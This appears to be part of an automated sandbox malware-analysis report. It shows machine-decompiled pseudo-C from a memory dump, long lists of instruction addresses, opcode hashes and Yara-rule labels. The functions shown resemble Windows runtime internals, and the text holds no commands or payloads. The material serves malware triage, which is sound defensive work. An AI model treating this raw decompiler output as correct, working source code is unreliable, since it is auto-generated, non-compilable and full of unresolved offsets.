																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00ffd5f2
0x00ffd5f5
0x00ffd5f5
0x00ffd5fd
0x00ffd600
0x00ffd60a
0x00ffd60d
0x00ffd617
0x00ffd61d
0x00ffd627
0x00ffd62e
0x00ffd911
0x00ffd913
0x00000000
0x00ffd919
0x00ffd919
0x00ffd919
0x00ffd634
0x00ffd634
0x00ffd634
0x00ffd634
0x00ffd640
0x00ffd8bf
0x00000000
0x00ffd646
0x00ffd646
0x00ffd64d
0x00ffd652
0x0104b2fc
0x0104b2fc
0x0104b302
0x0104b33b
0x0104b341
0x00000000
0x0104b304
0x0104b304
0x0104b319
0x0104b31e
0x0104b324
0x0104b326
0x0104b332
0x0104b347
0x0104b34c
0x0104b351
0x0104b35a
0x00000000
0x0104b328
0x0104b328
0x00000000
0x0104b328
0x0104b326
0x00ffd658
0x00ffd658
0x00ffd65b
0x00ffd665
0x00000000
0x00ffd66b
0x00ffd66b
0x00ffd66b
0x00ffd66b
0x00ffd66d
0x00ffd672
0x00ffd67a
0x00000000
0x00000000
0x00ffd680
0x00ffd686
0x00ffd8ce
0x00ffd8d4
0x00ffd8dd
0x00ffd8e0
0x00ffd68c
0x00ffd691
0x00ffd69d
0x00ffd6a2
0x00ffd6a7
0x00ffd6b0
0x00ffd6b5
0x00ffd6e0
0x00ffd6b7
0x00ffd6b7
0x00ffd6b9
0x00ffd6b9
0x00ffd6bb
0x00ffd6bd
0x00ffd6ce
0x00ffd6d0
0x00ffd6d2
0x0104b363
0x0104b365
0x00000000
0x0104b36b
0x00000000
0x0104b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ffd6bf
0x00ffd6bf
0x00ffd6e5
0x00ffd6e7
0x00ffd6e9
0x00ffd6ec
0x00ffd6ec
0x00ffd6ef
0x00ffd6f5
0x00ffd6f9
0x00ffd6fb
0x00ffd6fd
0x00ffd701
0x00ffd703
0x00ffd70a
0x00ffd70a
0x00ffd701
0x00ffd710
0x00ffd710
0x00ffd6c1
0x00ffd6c1
0x00ffd6c6
0x0104b36d
0x0104b36f
0x00000000
0x0104b375
0x0104b375
0x0104b375
0x00000000
0x0104b375
0x00000000
0x00ffd6cc
0x00ffd6d8
0x00ffd6d8
0x00ffd6d8
0x00000000
0x00ffd6c6
0x00ffd6bf
0x00000000
0x00ffd6da
0x00ffd6da
0x00ffd716
0x00ffd71b
0x00ffd720
0x00ffd726
0x00ffd726
0x00ffd72d
0x00000000
0x00ffd733
0x00ffd739
0x00ffd742
0x00ffd750
0x00ffd758
0x00ffd764
0x00ffd776
0x00ffd77a
0x00ffd783
0x00ffd928
0x00ffd92c
0x00ffd93d
0x00ffd944
0x00ffd94f
0x00ffd954
0x00ffd956
0x00ffd95f
0x00ffd961
0x00ffd973
0x00ffd973
0x00ffd956
0x00ffd944
0x00ffd92c
0x00ffd78b
0x0104b394
0x00ffd791
0x00ffd798
0x0104b3a3
0x0104b3bb
0x0104b3bb
0x00ffd7a5
0x00ffd866
0x00ffd870
0x00ffd892
0x00ffd898
0x00ffd89e
0x00ffd8a0
0x00ffd8a6
0x00ffd8ac
0x00ffd8ae
0x00ffd8b4
0x00ffd8b4
0x00ffd8ae
0x00ffd7a5
0x00ffd78b
0x00ffd7b1
0x0104b3c5
0x0104b3c5
0x00ffd7c3
0x00ffd7ca
0x00ffd7e5
0x00ffd7eb
0x00ffd8eb
0x00ffd8ed
0x00000000
0x00ffd8f3
0x00ffd8f3
0x00ffd8f3
0x00000000
0x00ffd8ed
0x00ffd7cc
0x00ffd7cc
0x00ffd7d2
0x00000000
0x00ffd7d4
0x00ffd7d4
0x00ffd7d7
0x00ffd7df
0x0104b3d4
0x0104b3d9
0x0104b3dc
0x0104b3dc
0x0104b3df
0x0104b3e2
0x0104b468
0x0104b46d
0x0104b46f
0x0104b46f
0x0104b475
0x00ffd8f8
0x00ffd8f9
0x00ffd8fd
0x0104b3e8
0x0104b3e8
0x0104b3eb
0x0104b3ed
0x00000000
0x0104b3ef
0x0104b3ef
0x0104b3f1
0x0104b3f4
0x0104b3fe
0x0104b404
0x0104b409
0x0104b40e
0x0104b410
0x0104b410
0x0104b414
0x0104b414
0x0104b41b
0x0104b420
0x0104b423
0x0104b425
0x0104b427
0x0104b42a
0x0104b42d
0x0104b42d
0x0104b42a
0x0104b432
0x0104b436
0x0104b438
0x0104b43b
0x0104b43b
0x0104b449
0x0104b44e
0x0104b454
0x0104b458
0x0104b458
0x0104b45d
0x00000000
0x0104b45d
0x0104b3ed
0x00000000
0x00000000
0x00000000
0x00ffd7df
0x00ffd7d2
0x00ffd7ca
0x0104b37c
0x0104b37e
0x0104b385
0x0104b38a
0x00000000
0x0104b38a
0x00ffd742
0x00ffd7f1
0x00ffd7f8
0x0104b49b
0x0104b49b
0x00ffd800
0x00ffd837
0x00ffd843
0x00ffd845
0x00ffd847
0x00ffd84a
0x00ffd84b
0x00ffd84e
0x00ffd857
0x00ffd818
0x00ffd824
0x00ffd831
0x0104b4a5
0x0104b4ab
0x0104b4b3
0x0104b4b8
0x0104b4bb
0x00000000
0x0104b4c1
0x0104b4c1
0x0104b4c8
0x00000000
0x0104b4ce
0x0104b4d4
0x0104b4e1
0x0104b4e3
0x0104b4e5
0x00000000
0x0104b4eb
0x0104b4f0
0x0104b4f2
0x00ffdac9
0x00ffdacc
0x00ffdacf
0x00ffdad1
0x00ffdd78
0x00ffdd78
0x00ffdcf2
0x00000000
0x00ffdad7
0x00ffdad9
0x00ffdadb
0x00000000
0x00000000
0x00ffdae1
0x00ffdae1
0x00ffdae4
0x00ffdae6
0x0104b4f9
0x0104b4f9
0x0104b500
0x00ffdaec
0x00ffdaec
0x00ffdaf5
0x00ffdaf8
0x00ffdafb
0x00ffdb03
0x00ffdb11
0x00ffdb16
0x00ffdb19
0x00ffdb1b
0x0104b52c
0x0104b531
0x0104b534
0x00ffdb21
0x00ffdb21
0x00ffdb24
0x00ffdcd9
0x00ffdce2
0x00ffdce5
0x00ffdd6a
0x00ffdd6d
0x00000000
0x00ffdd73
0x0104b51a
0x0104b51c
0x0104b51f
0x0104b524
0x00000000
0x0104b524
0x00ffdce7
0x00ffdce7
0x00ffdce7
0x00000000
0x00ffdce7
0x00000000
0x00ffdb2a
0x00ffdb2c
0x00ffdb31
0x00ffdb33
0x00ffdb36
0x00ffdb39
0x00ffdb3b
0x00ffdb66
0x00ffdb66
0x00ffdb3d
0x00ffdb3d
0x00ffdb3e
0x00ffdb46
0x00ffdb47
0x00ffdb49
0x00ffdb4c
0x00ffdb53
0x00ffdb55
0x00ffdb58
0x00ffdb5a
0x0104b50a
0x0104b50f
0x0104b512
0x00ffdb60
0x00ffdb60
0x00ffdb63
0x00ffdb63
0x00000000
0x00ffdb63
0x00ffdb5a
0x00ffdb3b
0x00ffdb24
0x00ffdb69
0x00ffdb69
0x00ffdb6c
0x00ffdb6f
0x00ffdb74
0x0104b557
0x0104b557
0x0104b55e
0x00ffdb7a
0x00ffdb7c
0x00ffdb7f
0x00ffdb82
0x00ffdb85
0x00000000
0x00ffdb8b
0x00ffdb8b
0x00ffdb8d
0x00ffdb9b
0x00ffdb9b
0x00ffdb9d
0x00ffdba0
0x00ffdba2
0x00ffdba4
0x00ffdba7
0x00ffdba9
0x00ffdbae
0x00ffdbae
0x00ffdbb1
0x00ffdbb4
0x00ffdbb4
0x00ffdbb7
0x00ffdbba
0x00ffdcd2
0x00ffdcd4
0x00000000
0x00ffdbc0
0x00ffdbc0
0x00ffdbd2
0x00ffdbd7
0x00ffdbda
0x00ffdbdd
0x00ffdbdf
0x00000000
0x00ffdbe5
0x00ffdbe5
0x00ffdbee
0x00ffdbf1
0x0104b541
0x0104b544
0x00000000
0x0104b546
0x0104b546
0x00000000
0x0104b546
0x00ffdbf7
0x00ffdbf7
0x00ffdbfd
0x00ffdbfd
0x00ffdbff
0x00ffdc0b
0x00ffdc15
0x00ffdc1b
0x00ffdc1d
0x00ffdc21
0x00ffdc21
0x00ffdc23
0x00ffdc23
0x00ffdc26
0x00ffdc29
0x00ffdc2b
0x00000000
0x00000000
0x00ffdc31
0x00ffdc34
0x00ffdc36
0x00ffdcbf
0x00ffdcbf
0x00ffdcc2
0x00000000
0x00ffdc3c
0x00ffdc41
0x00ffdc43
0x00000000
0x00ffdc45
0x00ffdc45
0x00ffdc47
0x00000000
0x00ffdc4d
0x00ffdc4d
0x00ffdc50
0x00ffdc52
0x00ffdc55
0x00ffdcfa
0x00ffdcfe
0x00ffdd08
0x00ffdd0a
0x00ffdd0c
0x00000000
0x00ffdd12
0x00ffdd15
0x00ffdd2d
0x00ffdd2f
0x00ffdd32
0x00ffdd35
0x00000000
0x00ffdd35
0x00ffdc5b
0x00ffdc5b
0x00ffdc5e
0x00ffdc61
0x00ffdc64
0x00ffdc67
0x00ffdc67
0x00ffdc6a
0x00ffdc6c
0x00ffdc8e
0x00ffdc8e
0x00ffdc91
0x00ffdc93
0x00ffdcce
0x00ffdcce
0x00ffdc95
0x00ffdc9c
0x00ffdc6e
0x00ffdc72
0x00ffdc75
0x00ffdc77
0x00ffdc79
0x0104b551
0x0104b551
0x00000000
0x00ffdc7f
0x00ffdc7f
0x00ffdc81
0x00000000
0x00ffdc83
0x00ffdc86
0x00ffdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00ffdc88
0x00ffdc81
0x00ffdc79
0x00ffdc6c
0x00ffdc55
0x00ffdc47
0x00ffdc43
0x00000000
0x00ffdc36
0x00ffdc23
0x00000000
0x00ffdbff
0x00ffdbf1
0x00ffdbdf
0x00ffdb8f
0x00ffdb92
0x00ffdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x00ffdb95
0x00ffdb8d
0x00ffdb85
0x00ffdb74
0x00ffdc9f
0x00ffdca2
0x00ffdcb0
0x00ffdcb0
0x00ffdad1
0x0104b4e5
0x0104b4c8
0x00000000
0x00000000
0x00000000
0x00ffd831
0x00000000
0x00ffd800
0x0104b47f
0x0104b485
0x00000000
0x0104b485
0x00ffd665
0x00ffd652
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
Instruction ID: 6fb51acb59f20522c2877c12fc0ce250e60e1bdc0cce265baeafb91d4780d94d
Opcode Fuzzy Hash: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
Instruction Fuzzy Hash: C8E1D271A013198FEB34DF29C880BB9B7B2BF85314F1441E9DA899B2A1DB34DD81DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FF849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00FF849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x10bf9c0);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x10d7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00FFCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01002280( *[fs:0x30], 0x10d8550);
						_t139 =  *0x10d7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0101F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00FFFFB0(_t193, _t235, 0x10d8550);
								L5:
								return E0103D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00FE1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x10d7b9c; // 0x0
							_t235 = L01004620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x10d7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0101A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00FFFFB0(_t193, _t235, 0x10d8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L010077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L010077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x10d7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x10d7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E010237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x10d7b9c; // 0x0
									_t214 = L01004620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E010237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x10d7b10 =  *0x10d7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x10d7b04 =  *0x10d7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L010077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L010077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x10d7b08 =  *0x10d7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E010257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0102F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L010077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0101A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L010077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E010296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x00ff849b
0x00ff849b
0x00ff849b
0x00ff849b
0x00ff849d
0x00ff84a2
0x00ff84a7
0x00ff84b1
0x00ff84d8
0x00000000
0x00ff84b3
0x00ff84c4
0x00ff84c9
0x00ff84cd
0x00ff84cf
0x00ff84cf
0x00ff84d6
0x00ff84e6
0x00ff84e9
0x00ff84ec
0x00ff84ef
0x00ff84f2
0x00ff84f4
0x00ff84fc
0x00ff8501
0x00ff8506
0x00ff8509
0x00ff86e0
0x00ff86e5
0x00ff86e8
0x00ff86ed
0x00ff86f0
0x00ff86f2
0x01049afd
0x01049b02
0x00ff84da
0x00ff84df
0x00ff84df
0x00ff86fa
0x00ff86fd
0x00ff86fe
0x00ff8701
0x00ff8706
0x00ff8709
0x00ff870b
0x00000000
0x00000000
0x00ff8711
0x00ff8725
0x00ff8727
0x00ff872a
0x00ff872c
0x01049af0
0x01049af5
0x00ff8732
0x00ff8732
0x00ff8732
0x00ff8735
0x00ff8737
0x00ff8515
0x00ff8515
0x00ff8518
0x00ff851d
0x00ff8523
0x00ff8527
0x00ff852b
0x00ff8537
0x00ff8539
0x00ff853c
0x00ff853e
0x00ff868c
0x00ff8691
0x00ff8699
0x00ff869b
0x00ff8744
0x00ff8748
0x00ff86a1
0x00ff86a1
0x00ff86a1
0x00ff86a4
0x00ff86a8
0x01049bdf
0x01049bdf
0x00ff86ae
0x00ff86b0
0x00000000
0x00ff86b6
0x00000000
0x01049be9
0x00ff86b0
0x00ff8544
0x00ff854a
0x00ff854d
0x00ff8551
0x00ff876e
0x00ff8778
0x00ff877b
0x00ff8780
0x00ff8557
0x00ff8557
0x00ff855d
0x00ff855d
0x00ff856b
0x00ff856e
0x00ff8570
0x00ff8573
0x00ff8576
0x00ff8576
0x00ff8579
0x00ff857b
0x00000000
0x00000000
0x00ff8581
0x00ff85a0
0x00ff85a2
0x00ff85a5
0x00ff85a7
0x01049b1b
0x01049b1b
0x00ff862e
0x00ff862e
0x00ff8631
0x00ff8631
0x00ff8634
0x00ff8636
0x00ff8669
0x00ff8669
0x00ff866b
0x01049bbf
0x01049bc4
0x01049bc8
0x01049bce
0x01049bce
0x00ff8671
0x00ff8671
0x00ff8674
0x00ff8676
0x01049bae
0x01049bae
0x00ff8676
0x00ff867c
0x00ff867e
0x00ff8688
0x00ff8688
0x00000000
0x00ff867e
0x00ff8638
0x00ff8638
0x00ff863b
0x00ff863e
0x00ff863f
0x00ff8642
0x00ff8645
0x00ff8648
0x00ff864d
0x01049b69
0x01049b6e
0x01049b7b
0x01049b81
0x01049b85
0x01049b89
0x01049ba7
0x01049b8b
0x01049b91
0x01049b9a
0x01049b9f
0x01049b9f
0x00ff8788
0x00ff878d
0x00ff8763
0x00ff8763
0x00ff8766
0x00000000
0x00ff8766
0x01049b70
0x00000000
0x01049b70
0x00ff8656
0x00ff865a
0x00ff865c
0x00ff8752
0x00ff8756
0x00000000
0x00000000
0x00ff875e
0x00000000
0x00ff875e
0x00ff8662
0x00ff8662
0x00ff8662
0x00ff8666
0x00000000
0x00ff8666
0x00ff85b7
0x00ff85b9
0x00ff85bc
0x00ff85bf
0x00ff85cc
0x00ff85d1
0x00ff85d4
0x00ff85db
0x00ff85de
0x00ff85e0
0x01049b5f
0x00000000
0x01049b5f
0x00ff85e6
0x00ff85ea
0x00ff86c3
0x00ff86c5
0x00ff86c8
0x00ff86ca
0x01049b16
0x00000000
0x01049b16
0x00ff86d6
0x00ff85f6
0x00ff85f6
0x00ff85f9
0x00ff8602
0x00ff8606
0x00ff860a
0x00ff860b
0x00ff860e
0x00ff8611
0x00000000
0x00ff8611
0x00ff85f3
0x00000000
0x00ff85f3
0x00ff8619
0x00ff861e
0x00ff861e
0x00ff8621
0x00ff8622
0x00ff8623
0x00ff8625
0x00ff862c
0x00000000
0x00ff873d
0x00000000
0x00ff873d
0x00ff8737
0x00ff850f
0x00ff8512
0x00000000
0x00ff8512
0x00000000
0x00ff84d6

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
Instruction ID: fe1b3f665e4d3a216fc5ee96dbba2d065b2203e1230272d9cfadc7591e037b1a
Opcode Fuzzy Hash: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
Instruction Fuzzy Hash: CBB18FB1E00209DFDB15DF98C984BAEBBB5BF48354F204129E645AB355DB74AC42DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0101513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0101513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x10dd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0102D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01002280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01004620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
